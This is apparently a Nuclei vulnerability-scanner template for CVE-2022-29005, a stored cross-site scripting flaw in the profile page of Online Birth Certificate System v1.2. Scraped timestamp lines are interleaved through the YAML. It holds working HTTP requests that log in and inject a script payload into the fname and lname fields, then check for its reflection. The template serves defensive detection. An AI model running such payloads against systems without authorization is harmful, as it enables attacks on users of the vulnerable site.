2022-09-01 13:02:09 +00:00
id : CVE-2022-29005
info :
2022-09-02 05:26:13 +00:00
name : Online Birth Certificate System V1.2 - Stored Cross-Site scripting
2022-09-01 13:02:09 +00:00
author : TenBird
2022-09-02 05:26:13 +00:00
severity : medium
description : |
Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.
2022-09-01 13:02:09 +00:00
reference :
2022-09-02 05:26:13 +00:00
- https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt
- https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
2022-09-01 13:02:09 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-29005
classification :
cve-id : CVE-2022-29005
2022-09-02 05:26:13 +00:00
metadata :
verified : true
tags : cve,cve2022,xss,obcs,authenticated
2022-09-01 13:02:09 +00:00
requests :
- raw :
- |
POST /obcs/user/login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
mobno={{username}}&password={{password}}&login=
- |
POST /obcs/user/profile.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
fname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=
2022-09-02 05:26:13 +00:00
- |
GET /obcs/user/dashboard.php HTTP/1.1
Host : {{Hostname}}
req-condition : true
2022-09-01 13:02:09 +00:00
redirects : true
2022-09-02 05:26:13 +00:00
max-redirects : 2
2022-09-01 13:02:09 +00:00
cookie-reuse : true
matchers :
2022-09-02 05:26:13 +00:00
- type : dsl
dsl :
- 'contains(all_headers_3, "text/html")'
- 'status_code_3 == 200'
- contains(body_3, 'admin-name\">nuclei<script>alert(document.domain);</script>')
condition : and